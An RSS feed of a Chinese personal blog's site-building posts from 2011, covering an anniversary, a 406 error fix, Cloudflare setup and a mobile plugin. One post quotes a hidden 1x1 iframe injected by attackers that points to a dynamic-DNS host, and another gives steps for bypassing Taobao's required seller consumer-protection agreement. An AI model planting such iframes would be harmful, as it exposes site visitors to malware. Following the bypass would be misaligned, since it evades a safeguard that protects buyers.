<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>冷博客 &#187; 博客与建站</title>
	<atom:link href="http://loneblog.com/blog/category/website/feed" rel="self" type="application/rss+xml" />
	<link>http://loneblog.com/blog</link>
	<description>见的人多了，我就更喜欢狗——罗曼·罗兰</description>
	<lastBuildDate>Sat, 04 Feb 2012 16:11:10 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.3</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>网站被插入frame代码，现已恢复</title>
		<link>http://loneblog.com/blog/loneblog-cracked-01.html</link>
		<comments>http://loneblog.com/blog/loneblog-cracked-01.html#comments</comments>
		<pubDate>Sat, 26 Nov 2011 15:01:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/loneblog-cracked-01.html</guid>
		<description><![CDATA[ 
&#160;
一趟海南，没管理网站，回来发现谷歌娘的safe browing 已经把我和谐了，原以为服务器上的其他网站的病毒，没太在意。
&#160;
没想到这么非主流的网站都有人“关照”
&#160;
今天仔细一看，发现确实有一段frame代码，嵌入了wordpress中，已经清除了，请大家放心。
 

&#160;
另外如果有忽略谷歌娘提示，或者使用的非chrome和ff的童鞋，大可放心，插入的代码基本不能访问。
&#160;
因为不能解析其域名，所以没有危害。
&#160;
nslookup kotiscity.zapto.org 8.8.8.8     DNS request timed out.      &#160;&#160;&#160; timeout was 2 seconds.      服务器:&#160; UnKnown      Address:&#160; 8.8.8.8 
DNS request timed out.     &#160;&#160;&#160; timeout was 2 seconds.    [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/11/2_71848807_diary.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="2_71848807_diary" border="0" alt="2_71848807_diary" src="http://loneblog.com/blog/wp-content/uploads/2011/11/2_71848807_diary_thumb.jpg" width="377" height="445" /></a> </p>
<p>&#160;</p>
<p>一趟海南，没管理网站，回来发现谷歌娘的safe browing 已经把我和谐了，原以为服务器上的其他网站的病毒，没太在意。</p>
<p>&#160;</p>
<p>没想到这么非主流的网站都有人“关照”</p>
<p>&#160;</p>
<p>今天仔细一看，发现确实有一段frame代码，嵌入了<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/wordpress" title="查看 wordpress 的全部文章" target="_blank">wordpress</a></span>中，<strong>已经清除了，请大家放心。</strong></p>
<p> <span id="more-1916"></span>
<p><strong></strong></p>
<p>&#160;</p>
<p>另外如果有忽略谷歌娘提示，或者使用的非chrome和ff的童鞋，大可放心，插入的代码基本不能访问。</p>
<p>&#160;</p>
<p>因为不能解析其域名，所以没有危害。</p>
<p>&#160;</p>
<blockquote><p>nslookup kotiscity.zapto.org 8.8.8.8     <br />DNS request timed out.      <br />&#160;&#160;&#160; timeout was 2 seconds.      <br />服务器:&#160; UnKnown      <br />Address:&#160; 8.8.8.8 </p>
<p>DNS request timed out.     <br />&#160;&#160;&#160; timeout was 2 seconds.      <br />*** UnKnown 找不到 kotiscity.zapto.org: Non-existent domain</p>
</blockquote>
<p>&#160;</p>
<p>&#160;</p>
<p>这段代码如下：</p>
<blockquote><p>&lt;iframe src=&quot;http://kotiscity.zapto.org/fu2/nig/pix.php?id=e907857954e5c472&quot; width=&quot;1&quot; height=&quot;1&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;</p>
</blockquote>
<h3><strong>总之，引起的担惊受怕，跟大家说一声抱歉。</strong></h3>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/loneblog-cracked-01.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>冷博客两岁了！</title>
		<link>http://loneblog.com/blog/loneblog-two-years-old.html</link>
		<comments>http://loneblog.com/blog/loneblog-two-years-old.html#comments</comments>
		<pubDate>Mon, 08 Aug 2011 00:08:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[冷博客]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/?p=1712</guid>
		<description><![CDATA[我从7月份着手写这篇周年纪念，为的是不落下一个细节。冷博客两岁了，从09年8月8日域名正式开通，到今天整整两岁。

一些数据
同年8月10日到现在：
冷博客共接待了14万独立访客的21万次访问。
冷博客共发表了400篇文章，获得了902条包括冷博客自己在内的评论。
以及2082条广告评论，和上百名订阅用户。
这些对于一个商业网站可能也就是一个星期或者一天的访问数据。不过对于冷博客来说，从来没有做过宣传的个人博客，冷博客只能说贵在坚持。
关于评论
期间有各种质疑和赞许，冷博客没有删除一条非广告评论，不管是说冷博客好还是差。
好比最近出现的两条差别很大的评论：

同一篇文章，同一个时间评论，同样是看不懂，不同人有着不同的解答。
人上一百形形色色，何况冷博客这800多条评论呢，所以冷博客坚持不删任何评论。
然后对内近2000条的垃圾评论，冷博客只想说你们或者你们的雇主可能不太懂wordpress里评论链接。
第一.wp的评论人的网站链接不能作为友情链接或者任何SEO的有利条件，因为其评论有rel=&#8217;external nofollow&#8217;的属性
第二.冷博客的访问量不够，还没有大量的人去点击评论人的链接，而且我这里有验证码，写垃圾评论又费时又费力。
关于广告
冷博客最近刚刚收到google adsense的广告费，只能说还在赔本中，不过单就冷博客这个站而言还是可以自负盈亏的。
冷博客每个文章页面有三个谷歌广告，一个主机上广告，确实有点儿多，而且冷博客自己也特讨厌广告。
不过为了冷博客能坚持下去（最近两个友链站纷纷关张），大家还是多多关照吧。
关于友链
最近又有两个申请友链的站点，一个是企业站，这个没办法友链，你不能让一个种地的和一个空姐做朋友吧。还是在友情链接内页里写的一样，有发展的能持久的个人站点。
关于主机
还是3ix的主机，虽然经常出问题，但客服是24&#215;7的，没有一次没人应答。这比国内的要好，域名也是3ix买的，可能还要比godaddy便宜一些（不算优惠码）。
站长们最关心的uptime如下，监控宝的本年截图：

这种东西一分钱一分货，如果你也想买和冷博客一样的主机，请点击我的邀请链接：http://www.3ix.org/sys/aff.php?aff=10342
关于屏蔽
最近冷博客一些文章被屏蔽，如果你通过搜索引擎或者什么的点进去会出现连接重置，这是典型的被墙了，还好只是关键字，没有涉及整个域名和IP，所以逼不得已，冷博客撤掉了这些&#8221;惹事儿&#8221;的文章。
关于未来
冷博客一会儿半会儿还不会关门，拿着google adsense的钱（虽然还没到手）又续了两年的域名和空间，到2013年了。总之，只要没被和谐冷博客就会一直存在！
]]></description>
			<content:encoded><![CDATA[<p>我从7月份着手写这篇周年纪念，为的是不落下一个细节。<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/%e5%86%b7%e5%8d%9a%e5%ae%a2" title="查看 冷博客 的全部文章" target="_blank">冷博客</a></span>两岁了，从09年8月8日域名正式开通，到今天整整两岁。</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/loneblogtwoyearsold.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="loneblog-two-years-old" src="http://loneblog.com/blog/wp-content/uploads/2011/07/loneblogtwoyearsold_thumb.jpg" border="0" alt="loneblog-two-years-old" width="415" height="276" /></a></p>
<h1>一些数据</h1>
<p>同年8月10日到现在：</p>
<p>冷博客共接待了<span style="font-size: large;">14万</span>独立访客的<span style="font-size: large;">21万</span>次访问。</p>
<p>冷博客共发表了<span style="font-size: large;">400篇</span>文章，获得了<span style="font-size: large;">902条</span>包括冷博客自己在内的评论。</p>
<p>以及<span style="font-size: large;">2082条</span>广告评论，和<span style="font-size: large;">上百名</span>订阅用户。</p>
<p>这些对于一个商业网站可能也就是一个星期或者一天的访问数据。不过对于冷博客来说，从来没有做过宣传的个人博客，冷博客只能说贵在坚持。</p>
<h1>关于评论</h1>
<p>期间有各种质疑和赞许，冷博客没有删除一条非广告评论，不管是说冷博客好还是差。</p>
<p>好比最近出现的两条差别很大的评论：</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/differentcomments.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="different-comments" src="http://loneblog.com/blog/wp-content/uploads/2011/07/differentcomments_thumb.jpg" border="0" alt="different-comments" width="589" height="233" /></a></p>
<p>同一篇文章，同一个时间评论，同样是看不懂，不同人有着不同的解答。</p>
<p>人上一百形形色色，何况冷博客这800多条评论呢，所以冷博客坚持不删任何评论。</p>
<p>然后对内近2000条的垃圾评论，冷博客只想说你们或者你们的雇主可能不太懂wordpress里评论链接。</p>
<p>第一.wp的评论人的网站链接不能作为友情链接或者任何SEO的有利条件，因为其评论有rel=&#8217;external nofollow&#8217;的属性</p>
<p>第二.冷博客的访问量不够，还没有大量的人去点击评论人的链接，而且我这里有验证码，写垃圾评论又费时又费力。</p>
<h1>关于广告</h1>
<p>冷博客最近刚刚收到google adsense的广告费，只能说还在赔本中，不过单就冷博客这个站而言还是可以自负盈亏的。</p>
<p>冷博客每个文章页面有三个谷歌广告，一个主机上广告，确实有点儿多，而且冷博客自己也特讨厌广告。</p>
<p>不过为了冷博客能坚持下去（最近两个友链站纷纷关张），大家还是多多关照吧。</p>
<h1>关于友链</h1>
<p>最近又有两个申请友链的站点，一个是企业站，这个没办法友链，你不能让一个种地的和一个空姐做朋友吧。还是在友情链接内页里写的一样，有发展的能持久的个人站点。</p>
<h1>关于主机</h1>
<p>还是3ix的主机，虽然经常出问题，但客服是24&#215;7的，没有一次没人应答。这比国内的要好，域名也是3ix买的，可能还要比godaddy便宜一些（不算优惠码）。</p>
<p>站长们最关心的uptime如下，监控宝的本年截图：</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/hostuptimejiankongbaoprt.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="host-uptime-jiankongbao-prt" src="http://loneblog.com/blog/wp-content/uploads/2011/07/hostuptimejiankongbaoprt_thumb.jpg" border="0" alt="host-uptime-jiankongbao-prt" width="436" height="347" /></a></p>
<p>这种东西一分钱一分货，如果你也想买和冷博客一样的主机，请点击我的邀请链接：<a title="http://www.3ix.org/sys/aff.php?aff=10342" href="http://www.3ix.org/sys/aff.php?aff=10342">http://www.3ix.org/sys/aff.php?aff=10342</a></p>
<h1>关于屏蔽</h1>
<p>最近冷博客一些文章被屏蔽，如果你通过搜索引擎或者什么的点进去会出现连接重置，这是典型的被墙了，还好只是关键字，没有涉及整个域名和IP，所以逼不得已，冷博客撤掉了这些&#8221;惹事儿&#8221;的文章。</p>
<h1>关于未来</h1>
<p>冷博客一会儿半会儿还不会关门，拿着google adsense的钱（虽然还没到手）又续了两年的域名和空间，到2013年了。总之，只要没被和谐冷博客就会一直存在！</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/loneblog-two-years-old.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>406 Not Acceptable 的一种解决方法</title>
		<link>http://loneblog.com/blog/406-not-acceptable-resolution.html</link>
		<comments>http://loneblog.com/blog/406-not-acceptable-resolution.html#comments</comments>
		<pubDate>Mon, 01 Aug 2011 12:49:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[406]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[WLW]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/406-not-acceptable-resolution.html</guid>
		<description><![CDATA[昨天的日志没有提交上去，冷博客用的是windows live writer ，发布的时候提示 
在这个页面上：
http://loneblog.com/blog/xmlrpc.php
406 Not Acceptable
当时以为是网络问题，今天到单位一看，还是不行。
随即又重新装了一个wordpress3.1 在服务器上，测试了一下还是406错误，于是又换了个离线软件，总之不行。
 
&#160;
谷歌了一下，大概可能是这个问题：
关闭 Mod security 设置。有的服务器可能允许用户通过使用.htaccess控制     Mod security 选项权限，但是很多不支持。所以最好请空间商帮你关闭。给空间商发个ticket，请他们关闭
Mod Security服务.下面是范文，呵呵 ^_^
&#160;&#160;&#160;&#160;&#160;&#160;&#160; Hello, I am sorry to bother you! I hope you can help me disable the Mod security for this domain: xx.com, my cpanel account name is XXX. Because my URL must contain the characters [...]]]></description>
			<content:encoded><![CDATA[<p>昨天的日志没有提交上去，冷博客用的是windows live writer ，发布的时候提示 </p>
<p>在这个页面上：</p>
<p>http://loneblog.com/blog/xmlrpc.php</p>
<p><span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/406" title="查看 406 的全部文章" target="_blank">406</a></span> Not Acceptable</p>
<p>当时以为是网络问题，今天到单位一看，还是不行。</p>
<p>随即又重新装了一个wordpress3.1 在服务器上，测试了一下还是406错误，于是又换了个离线软件，总之不行。</p>
<p> <span id="more-1736"></span>
<p>&#160;</p>
<p>谷歌了一下，大概可能是这个问题：</p>
<blockquote><p>关闭 Mod security 设置。有的服务器可能允许用户通过使用.htaccess控制     <br />Mod security 选项权限，但是很多不支持。所以最好请空间商帮你关闭。给空间商发个ticket，请他们关闭</p>
<p>Mod Security服务.下面是范文，呵呵 ^_^</p>
<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160; Hello, I am sorry to bother you! I hope you can help me disable the Mod security for this domain: xx.com, my cpanel account name is XXX. Because my URL must contain the characters “%”, but the Mod security led to the <span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/error" title="查看 error 的全部文章" target="_blank">error</a></span>, thanks very much!</p>
<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 同时以下是通过增加.htaccess规则来关闭mod_security模块，2个规则是一样的功效，如果你增加后发现空间打开出现500错误，那么说明你的服务器不允许自定义关闭mod_security模块，只能联系空间商管理员了。</p>
</blockquote>
<p>于是我在线问客服，客服跟我整整周旋了两个小时，两个小时呀，有木有，终于把服务器上的mod_security关掉了，问题顺利解决。</p>
<p>期间冷博客停运1个小时。</p>
<p>如果你遇到一些功能页面发生406错误，可以这样尝试修改：</p>
<p>在根目录下创建或者修改.htaccess文件，加入这两行：</p>
<p>SecFilterEngine Off   <br />SecFilterScanPOST Off</p>
<p>&#160;</p>
<p>如果出现500错误，很可能是这个mod_security模块的问题。赶紧致电客服。</p>
<p>这里还是要夸一夸3ix的客服，因为冷博客从北京时间17点开始询问，正是美国凌晨，客服很有耐心的跟我周旋了两个小时，没有推脱耗，非常敬业！</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/406-not-acceptable-resolution.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>免费CDN服务 来自cloudflare</title>
		<link>http://loneblog.com/blog/cloudflare-cdn.html</link>
		<comments>http://loneblog.com/blog/cloudflare-cdn.html#comments</comments>
		<pubDate>Sun, 24 Jul 2011 11:02:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[cdn]]></category>
		<category><![CDATA[cloudflare]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/cloudflare-cdn.html</guid>
		<description><![CDATA[

来自美国的网站安全服务提供商，按照官方说法，提供了除全球分布的CDN服务器之外，外还有安全dns、防火墙、网站资源优化分析、防毒防盗链等大大小小20来项功能。而且大部分功能的basci版都是免费的  
 
&#160;
官网：http://www.cloudflare.com
之前据说被屏蔽过，不知道以后会不会抽风。
虽然没有中文支援，不过使用很简单，点注册，无需验证邮箱，之后就可以通过四步添加站点。
&#160;
1.输入域名
如果写的是二级域名，会自动找主域名如果，没有特殊要求直接下一步即可。
2.检查域名
网站自动检测所有二级域名，如果有遗漏手动添加即可，如果没有特殊要求直接下一步即可。
彩色的云彩是启用该服务的，灰色的是保持原样。对于一些SSh SSL等网站建议不开启CDN
 
3.配置cloudflare
很多设置，包括防火墙、缓存级别、安全级别、防盗链等设置，很多有意思的功能在这里都能找到。
如果没有特殊要求直接下一步即可。
&#160;
 
然后你需要到自己的dns服务器或者dns域名提供商那里，把自己的域名指向他给的dns服务器的地址。
到此大功告成！
&#160;
如果想要更多更强大的功能，就要掏银子了，而且这个服务自带了流量监控功能，不过考虑到国内大部分ISP自己做cache的dns，导致dns更新周期过慢，而且这个流量统计还不够专业。
不得不说网站做的非常漂亮。下图是部分统计信息。
 
&#160;
冷博客现在全站包括过劳死中文站，都在用这个cdn，由于3ix也是在美国，可能比以前会快一点点。
这是他IP的超级ping数据：
最快：美国[地区] 4 毫秒&#160;&#160;&#160; 最慢：河南[联通] 362 毫秒   电信平均： 222 毫秒&#160;&#160;&#160; 网通平均： 316 毫秒
]]></description>
			<content:encoded><![CDATA[<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudflare.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="cloudflare" border="0" alt="cloudflare" src="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudflare_thumb.jpg" width="328" height="81" /></a>
</p>
<p>来自美国的网站安全服务提供商，按照官方说法，提供了除全球分布的CDN服务器之外，外还有安全dns、防火墙、网站资源优化分析、防毒防盗链等大大小小20来项功能。而且大部分功能的basci版都是免费的 <img src='http://loneblog.com/blog/wp-includes/images/smilies/icon_px_11.gif' alt=':pxxiao:' class='wp-smiley' /> </p>
<p> <span id="more-1731"></span>
<p>&#160;</p>
<p>官网：<a title="https://www.cloudflare.com" href="http://www.cloudflare.com">http://www.cloudflare.com</a></p>
<p>之前据说被屏蔽过，不知道以后会不会抽风。</p>
<p>虽然没有中文支援，不过使用很简单，点注册，无需验证邮箱，之后就可以通过四步添加站点。</p>
<p>&#160;</p>
<p>1.输入域名</p>
<p>如果写的是二级域名，会自动找主域名如果，没有特殊要求直接下一步即可。</p>
<p>2.检查域名</p>
<p>网站自动检测所有二级域名，如果有遗漏手动添加即可，如果没有特殊要求直接下一步即可。</p>
<p>彩色的云彩是启用该服务的，灰色的是保持原样。对于一些SSh SSL等网站建议不开启CDN</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflarednssettingprt.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="cloudeflare-dns-setting-prt" border="0" alt="cloudeflare-dns-setting-prt" src="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflarednssettingprt_thumb.jpg" width="328" height="175" /></a> </p>
<p>3.配置<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/cloudflare" title="查看 cloudflare 的全部文章" target="_blank">cloudflare</a></span></p>
<p>很多设置，包括防火墙、缓存级别、安全级别、防盗链等设置，很多有意思的功能在这里都能找到。</p>
<p>如果没有特殊要求直接下一步即可。</p>
<p>&#160;</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflaresettingprt.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="cloudeflare-setting-prt" border="0" alt="cloudeflare-setting-prt" src="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflaresettingprt_thumb.jpg" width="328" height="204" /></a> </p>
<p>然后你需要到自己的dns服务器或者dns域名提供商那里，把自己的域名指向他给的dns服务器的地址。</p>
<p>到此大功告成！</p>
<p>&#160;</p>
<p>如果想要更多更强大的功能，就要掏银子了，而且这个服务自带了流量监控功能，不过考虑到国内大部分ISP自己做cache的dns，导致dns更新周期过慢，而且这个流量统计还不够专业。</p>
<p>不得不说网站做的非常漂亮。下图是部分统计信息。</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflareanalyticsprt.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="cloudeflare-analytics-prt" border="0" alt="cloudeflare-analytics-prt" src="http://loneblog.com/blog/wp-content/uploads/2011/07/cloudeflareanalyticsprt_thumb.jpg" width="328" height="232" /></a> </p>
<p>&#160;</p>
<p>冷博客现在全站包括过劳死中文站，都在用这个<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/cdn" title="查看 cdn 的全部文章" target="_blank">cdn</a></span>，由于3ix也是在美国，可能比以前会快一点点。</p>
<p>这是他IP的超级ping数据：</p>
<p>最快：美国[地区] 4 毫秒&#160;&#160;&#160; 最慢：河南[联通] 362 毫秒   <br />电信平均： 222 毫秒&#160;&#160;&#160; 网通平均： 316 毫秒</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/cloudflare-cdn.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>简单破解淘宝 非消保不能发布商品</title>
		<link>http://loneblog.com/blog/crack-taobao-xiaobao.html</link>
		<comments>http://loneblog.com/blog/crack-taobao-xiaobao.html#comments</comments>
		<pubDate>Tue, 19 Apr 2011 07:43:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[生活]]></category>
		<category><![CDATA[网络相关]]></category>
		<category><![CDATA[opera]]></category>
		<category><![CDATA[淘宝]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/crack-taobao-xiaobao.html</guid>
		<description><![CDATA[首先，冷博客100%赞成淘宝的消费者保障计划，因为冷博客就曾经在淘宝吃过亏。买了一年的虚拟物品，半截人跑了，不给续费了&#8230;
后来，冷博客质问淘宝客服的时候，发现淘宝不会追究这类人的责任，只能关闭其商店，并没有更多举措，比如透露给受害者卖家信息等等。
即使是办理了淘宝消保计划的商家，仍然可以放弃消保的钱，赚一票就走人！
所以，消保只是一把玻璃锁，防君子不防小人。
至于淘宝借此由头来敛财，实属马云的奸诈。每个商家不加入消保计划就不能发布商品，然后卖家把钱存到淘宝（支付宝），作为抵押金，淘宝光这一点就能坐收渔翁之利！淘宝变身保险公司，实属奸诈！
念念碎了这么多，无非是想说，消保固然好，强制执行就有悖道义！
下面教大家简单破解淘宝这个小把戏。

1.下载Opera浏览器，我用的版本信息如下：
版本信息
版本
11.10
编制
2092
平台
Win32
系统
Windows 7
2.打开并找到：“您未签署《消费者保障服务协议》，暂不能发布宝贝”的页面。

在页面右键，点击“源代码&#8221;
找到并删除如下字段：
&#60;div id=&#8221;J_ProtocolLayer&#8221; class=&#8221;layer-container&#8221;&#62;
&#60;div class=&#8221;layer-content&#8221;&#62;
&#60;div id=&#8221;J_LayerContent&#8221;&#62;
&#60;strong&#62;您未签署《消费者保障服务协议》，暂不能发布宝贝&#60;/strong&#62;
&#60;p&#62;自2011年1月1日起，全网卖家须签署《消费者保障服务协议》承诺为消费者提供购物保障服务。若未签署协议，将不能发布宝贝。&#60;/p&#62;
&#60;p&#62;点击“签署协议”按钮，您将进入签署消保协议页面签署协议。&#60;/p&#62;
&#60;/div&#62;
&#60;div class=&#8221;layer-btn&#8221;&#62;                &#60;a id=&#8221;J_BtnTo&#8221; href=&#8221;http://ecrm.taobao.com/prepay/sign_agreement.htm&#8221; target=&#8221;_blank&#8221; class=&#8221;advise&#8221;&#62;去签署协议&#60;span class=&#8221;jump-gt&#8221;&#62;&#38;gt;&#38;gt;&#60;/span&#62;&#60;/a&#62;
&#60;/div&#62;
&#60;/div&#62;
&#60;/div&#62;
这是一个ProtocolLayer的div，删除之。点击左上角”应用更改“，再回到刚才发布页~可以发布了吧~
鉴于淘宝对已经发布和下架的商品修改没有限制，大家可以先存一些没用的东西，以防以后淘宝更多举动！
最后，强大的opera还有其他用处，此文权当抛砖引玉，老鸟莫笑！
]]></description>
			<content:encoded><![CDATA[<p>首先，冷博客100%赞成<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/%e6%b7%98%e5%ae%9d" title="查看 淘宝 的全部文章" target="_blank">淘宝</a></span>的消费者保障计划，因为冷博客就曾经在<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/%e6%b7%98%e5%ae%9d" title="查看 淘宝 的全部文章" target="_blank">淘宝</a></span>吃过亏。买了一年的虚拟物品，半截人跑了，不给续费了&#8230;</p>
<p>后来，冷博客质问淘宝客服的时候，发现淘宝不会追究这类人的责任，只能关闭其商店，并没有更多举措，比如透露给受害者卖家信息等等。</p>
<p>即使是办理了淘宝消保计划的商家，仍然可以放弃消保的钱，赚一票就走人！</p>
<p>所以，消保只是一把玻璃锁，防君子不防小人。</p>
<p><del datetime="2011-04-19T09:09:43+00:00">至于淘宝借此由头来敛财，实属马云的奸诈。每个商家不加入消保计划就不能发布商品，然后卖家把钱存到淘宝（支付宝），作为抵押金，淘宝光这一点就能坐收渔翁之利！淘宝变身保险公司，实属奸诈！</del></p>
<p>念念碎了这么多，无非是想说，消保固然好，强制执行就有悖道义！</p>
<p>下面教大家简单破解淘宝这个小把戏。</p>
<p><span id="more-1574"></span></p>
<p>1.下载Opera浏览器，我用的版本信息如下：</p>
<blockquote><p>版本信息<br />
版本<br />
11.10</p>
<p>编制<br />
2092</p>
<p>平台<br />
Win32</p>
<p>系统<br />
Windows 7</p></blockquote>
<p>2.打开并找到：“您未签署《消费者保障服务协议》，暂不能发布宝贝”的页面。</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/04/taobao-xiaobao.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="taobao-xiaobao" src="http://loneblog.com/blog/wp-content/uploads/2011/04/taobao-xiaobao_thumb.jpg" border="0" alt="taobao-xiaobao" width="400" height="233" /></a></p>
<p>在页面右键，点击“源代码&#8221;</p>
<p>找到并删除如下字段：</p>
<blockquote><p>&lt;div id=&#8221;J_ProtocolLayer&#8221; class=&#8221;layer-container&#8221;&gt;<br />
&lt;div class=&#8221;layer-content&#8221;&gt;<br />
&lt;div id=&#8221;J_LayerContent&#8221;&gt;<br />
&lt;strong&gt;您未签署《消费者保障服务协议》，暂不能发布宝贝&lt;/strong&gt;<br />
&lt;p&gt;自2011年1月1日起，全网卖家须签署《消费者保障服务协议》承诺为消费者提供购物保障服务。若未签署协议，将不能发布宝贝。&lt;/p&gt;<br />
&lt;p&gt;点击“签署协议”按钮，您将进入签署消保协议页面签署协议。&lt;/p&gt;<br />
&lt;/div&gt;<br />
&lt;div class=&#8221;layer-btn&#8221;&gt;                &lt;a id=&#8221;J_BtnTo&#8221; href=&#8221;http://ecrm.taobao.com/prepay/sign_agreement.htm&#8221; target=&#8221;_blank&#8221; class=&#8221;advise&#8221;&gt;去签署协议&lt;span class=&#8221;jump-gt&#8221;&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;/a&gt;<br />
&lt;/div&gt;<br />
&lt;/div&gt;<br />
&lt;/div&gt;</p></blockquote>
<p>这是一个ProtocolLayer的div，删除之。点击左上角”应用更改“，再回到刚才发布页~可以发布了吧~</p>
<p>鉴于淘宝对已经发布和下架的商品修改没有限制，大家可以先存一些没用的东西，以防以后淘宝更多举动！</p>
<p>最后，强大的<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/opera" title="查看 opera 的全部文章" target="_blank">opera</a></span>还有其他用处，此文权当抛砖引玉，老鸟莫笑！</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/crack-taobao-xiaobao.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>添加了便于手机访问的wap插件，同时更新二维码访问</title>
		<link>http://loneblog.com/blog/wordpress-mobile-pack.html</link>
		<comments>http://loneblog.com/blog/wordpress-mobile-pack.html#comments</comments>
		<pubDate>Sun, 27 Mar 2011 08:38:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[mobile pack]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/wordpress-mobile-pack.html</guid>
		<description><![CDATA[以后从手机等便携设备访问冷博客，将会更加方面和节省流量。从手机浏览看起来是这个样子的：
 
用的是WordPress Mobile Pack，从这里可以找到他：http://wordpress.org/extend/plugins/wordpress-mobile-pack/
非常不错的插件，会自动通过浏览器辨识是否用手机等设备而不是PC浏览本站。
还有就是二维码，通过扫描软件轻松访问：


]]></description>
			<content:encoded><![CDATA[<p>以后从手机等便携设备访问冷博客，将会更加方面和节省流量。从手机浏览看起来是这个样子的：</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/03/image2.png" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2011/03/image_thumb2.png" width="165" height="240" /></a> </p>
<p>用的是<strong>WordPress Mobile Pack</strong>，从这里可以找到他：<a title="http://wordpress.org/extend/plugins/wordpress-mobile-pack/" href="http://wordpress.org/extend/plugins/wordpress-mobile-pack/">http://wordpress.org/extend/plugins/wordpress-mobile-pack/</a></p>
